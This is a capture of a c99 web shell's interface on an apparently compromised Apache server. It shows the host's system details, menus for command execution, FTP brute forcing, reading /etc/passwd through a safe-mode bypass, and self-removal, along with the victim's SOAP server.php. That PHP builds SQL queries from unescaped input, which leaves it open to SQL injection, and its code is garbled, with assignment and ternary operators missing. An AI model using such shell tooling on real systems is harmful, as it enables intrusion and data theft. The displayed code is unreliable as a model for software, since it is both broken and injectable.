!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/nusoap/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     server.php (10.07 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? 
    //Pull in the NuSOAP code
    require_once('lib/nusoap/nusoap.php');
    
    //Create the server instance
    $server = new soap_server();

    //Register the method to expose
    $server->register('test');
    $server->register('getResearchID');
    $server->register('getResearchTB');    
    $server->register('getResearchCharTB');
    $server->register('getResearchFileTB');
    $server->register('getResearchPublicTB');
    $server->register('getResearchSuccessTB');

    //Define the method as a PHP function
    function test(){                
        $txt "Hello World";
        return $txt;
    }
    
    function getResearchID($tableName){
        include_once "../include/Config.php";
        include_once "class/clsConnection.php";
        include_once "class/clsDB.php";

        $hostname $ServerName;
        $dbname $DataBaseName;
        $username $UserName;
        $password $UserPassword;
        $conn = new clsConnection("$hostname","$dbname","$username","$password");
        $sql "select * from $tableName";
        $result mysql_query($sql);
        $row mysql_num_rows($result);
        
        switch($tableName){
            case "research_tb" :
                for($i=0;$i<$row;$i++){
                    $researchID $i == mysql_result($result,$i,"Research_code") : $researchID.",".mysql_result($result,$i,"Research_code");
                }
                break;
            
            case "research_char_tb" :
                for($i=0;$i<$row;$i++){
                    $researchID $i == mysql_result($result,$i,"RecharId") : $researchID.",".mysql_result($result,$i,"RecharId");
                }
                break;
            
            case "research_file_tb" :
                for($i=0;$i<$row;$i++){
                    $researchID $i == mysql_result($result,$i,"Research_Id") : $researchID.",".mysql_result($result,$i,"Research_Id");                    
                }
                break;
            
            case "research_public_tb" :
                for($i=0;$i<$row;$i++){
                    $researchID $i == mysql_result($result,$i,"RepbCo") : $researchID.",".mysql_result($result,$i,"RepbCo");                    
                }
                break;
            
            case "research_success_tb" :
                for($i=0;$i<$row;$i++){
                    $researchID $i == mysql_result($result,$i,"ResuccessId") : $researchID.",".mysql_result($result,$i,"ResuccessId");
                }
                break;            
        }        
        return $researchID;                
    }

    function getResearchTB($researchCode){
        include_once "../include/Config.php";
        include_once "class/clsConnection.php";
        include_once "class/clsDB.php";

        $hostname $ServerName;
        $dbname $DataBaseName;
        $username $UserName;
        $password $UserPassword;
        $conn = new clsConnection("$hostname","$dbname","$username","$password");
        $sql "select * from research_tb where Research_code = '$researchCode' limit 1";
        $result mysql_query($sql);        
        $data[0] = base64_encode(mysql_result($result,0,0));
        $data[1] = base64_encode(mysql_result($result,0,1));
        $data[2] = base64_encode(mysql_result($result,0,2));
        $data[3] = base64_encode(mysql_result($result,0,3));
        $data[4] = base64_encode(mysql_result($result,0,4));
        $data[5] = base64_encode(mysql_result($result,0,5));
        $data[6] = base64_encode(mysql_result($result,0,6));
        $data[7] = base64_encode(mysql_result($result,0,7)); 
        $data[8] = base64_encode(mysql_result($result,0,8)); 
        $data[9] = base64_encode(mysql_result($result,0,9));
        $data[10] = base64_encode(mysql_result($result,0,10));
        $data[11] = base64_encode(mysql_result($result,0,11));
        $data[12] = base64_encode(mysql_result($result,0,12));
        $data[13] = base64_encode(mysql_result($result,0,13));
        $data[14] = base64_encode(mysql_result($result,0,14));
        $data[15] = base64_encode(mysql_result($result,0,15));
        $data[16] = base64_encode(mysql_result($result,0,16)); 
        $data[17] = base64_encode(mysql_result($result,0,17));
        $data[18] = base64_encode(mysql_result($result,0,18));
        $data[19] = base64_encode(mysql_result($result,0,19));
        $data[20] = base64_encode(mysql_result($result,0,20));
        $data[21] = base64_encode(mysql_result($result,0,21));
        $data[22] = base64_encode(mysql_result($result,0,22));
        $data[23] = base64_encode(mysql_result($result,0,23));
        $data[24] = base64_encode(mysql_result($result,0,24));
        $data[25] = base64_encode(mysql_result($result,0,25)); 
        $data[26] = base64_encode(mysql_result($result,0,26));
        $data[27] = base64_encode(mysql_result($result,0,27));
        $data[28] = base64_encode(mysql_result($result,0,28));
        $data[29] = base64_encode(mysql_result($result,0,29));
        $data[30] = base64_encode(mysql_result($result,0,30));
        $data[31] = base64_encode(mysql_result($result,0,31));
        $data[32] = base64_encode(mysql_result($result,0,32));
        $data[33] = base64_encode(mysql_result($result,0,33));
        $data[34] = base64_encode(mysql_result($result,0,34));        
        $conn->Disconnect();        
        return $data;
    }    

    function getResearchCharTB($researchCode){
        include_once "../include/Config.php";
        include_once "class/clsConnection.php";
        include_once "class/clsDB.php";

        $hostname $ServerName;
        $dbname $DataBaseName;
        $username $UserName;
        $password $UserPassword;
        $conn = new clsConnection("$hostname","$dbname","$username","$password");
        $sql "select * from research_char_tb where RecharId = '$researchCode' limit 1";
        $result mysql_query($sql);
        $data[0] = base64_encode(mysql_result($result,0,0));
        $data[1] = base64_encode(mysql_result($result,0,1));
        $data[2] = base64_encode(mysql_result($result,0,2));
        $data[3] = base64_encode(mysql_result($result,0,3));
        $data[4] = base64_encode(mysql_result($result,0,4));
        $data[5] = base64_encode(mysql_result($result,0,5));
        $data[6] = base64_encode(mysql_result($result,0,6));
        $conn->Disconnect();        
        return $data;
    }
    
    function getResearchFileTB($researchCode){
        include_once "../include/Config.php";
        include_once "class/clsConnection.php";
        include_once "class/clsDB.php";

        $hostname $ServerName;
        $dbname $DataBaseName;
        $username $UserName;
        $password $UserPassword;
        $conn = new clsConnection("$hostname","$dbname","$username","$password");
        $sql "select * from research_file_tb where Research_Id = '$researchCode' limit 1";
        $result mysql_query($sql);
        $data[0] = base64_encode(mysql_result($result,0,0));
        $data[1] = base64_encode(mysql_result($result,0,1));
        $data[2] = base64_encode(mysql_result($result,0,2));
        $data[3] = base64_encode(mysql_result($result,0,3));
        $data[4] = base64_encode(mysql_result($result,0,4));
        $data[5] = base64_encode(mysql_result($result,0,5));
        $data[6] = base64_encode(mysql_result($result,0,6));
        $data[7] = base64_encode(mysql_result($result,0,7)); 
        $data[8] = base64_encode(mysql_result($result,0,8)); 
        $data[9] = base64_encode(mysql_result($result,0,9));
        $data[10] = base64_encode(mysql_result($result,0,10));
        $data[11] = base64_encode(mysql_result($result,0,11));
        $conn->Disconnect();        
        return $data;
    }
    
    function getResearchPublicTB($researchCode){
        include_once "../include/Config.php";
        include_once "class/clsConnection.php";
        include_once "class/clsDB.php";

        $hostname $ServerName;
        $dbname $DataBaseName;
        $username $UserName;
        $password $UserPassword;
        $conn = new clsConnection("$hostname","$dbname","$username","$password");
        $sql "select * from research_public_tb where RepbCo = '$researchCode' limit 1";
        $result mysql_query($sql);
        $data[0] = base64_encode(mysql_result($result,0,0));
        $data[1] = base64_encode(mysql_result($result,0,1));
        $data[2] = base64_encode(mysql_result($result,0,2));
        $data[3] = base64_encode(mysql_result($result,0,3));
        $data[4] = base64_encode(mysql_result($result,0,4));
        $data[5] = base64_encode(mysql_result($result,0,5));
        $data[6] = base64_encode(mysql_result($result,0,6));
        $data[7] = base64_encode(mysql_result($result,0,7)); 
        $data[8] = base64_encode(mysql_result($result,0,8)); 
        $data[9] = base64_encode(mysql_result($result,0,9));
        $data[10] = base64_encode(mysql_result($result,0,10));
        $data[11] = base64_encode(mysql_result($result,0,11));
        $data[12] = base64_encode(mysql_result($result,0,12));
        $data[13] = base64_encode(mysql_result($result,0,13));
        $data[14] = base64_encode(mysql_result($result,0,14));
        $data[15] = base64_encode(mysql_result($result,0,15));
        $data[16] = base64_encode(mysql_result($result,0,16)); 
        $data[17] = base64_encode(mysql_result($result,0,17));
        $data[18] = base64_encode(mysql_result($result,0,18));
        $data[19] = base64_encode(mysql_result($result,0,19));
        $data[20] = base64_encode(mysql_result($result,0,20));
        $data[21] = base64_encode(mysql_result($result,0,21));
        $data[22] = base64_encode(mysql_result($result,0,22));
        $data[23] = base64_encode(mysql_result($result,0,23));
        $data[24] = base64_encode(mysql_result($result,0,24));
        $data[25] = base64_encode(mysql_result($result,0,25)); 
        $data[26] = base64_encode(mysql_result($result,0,26));
        $data[27] = base64_encode(mysql_result($result,0,27));
        $data[28] = base64_encode(mysql_result($result,0,28));
        $data[29] = base64_encode(mysql_result($result,0,29));
        $data[30] = base64_encode(mysql_result($result,0,30));
        $data[31] = base64_encode(mysql_result($result,0,31));
        $data[32] = base64_encode(mysql_result($result,0,32));
        $data[33] = base64_encode(mysql_result($result,0,33));    
        $conn->Disconnect();        
        return $data;
    }

    function getResearchSuccessTB($researchCode){
        include_once "../include/Config.php";
        include_once "class/clsConnection.php";
        include_once "class/clsDB.php";

        $hostname $ServerName;
        $dbname $DataBaseName;
        $username $UserName;
        $password $UserPassword;
        $conn = new clsConnection("$hostname","$dbname","$username","$password");
        $sql "select * from research_success_tb where ResuccessId = '$researchCode' limit 1";
        $result mysql_query($sql);
        $data[0] = base64_encode(mysql_result($result,0,0));
        $data[1] = base64_encode(mysql_result($result,0,1));
        $data[2] = base64_encode(mysql_result($result,0,2));
        $data[3] = base64_encode(mysql_result($result,0,3));
        $data[4] = base64_encode(mysql_result($result,0,4));
        $data[5] = base64_encode(mysql_result($result,0,5));
        $conn->Disconnect();        
        return $data;
    }

    //Use the request to (try to) invoke the service
    $HTTP_RAW_POST_DATA = isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA '';
    $server->service($HTTP_RAW_POST_DATA);

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.009 ]--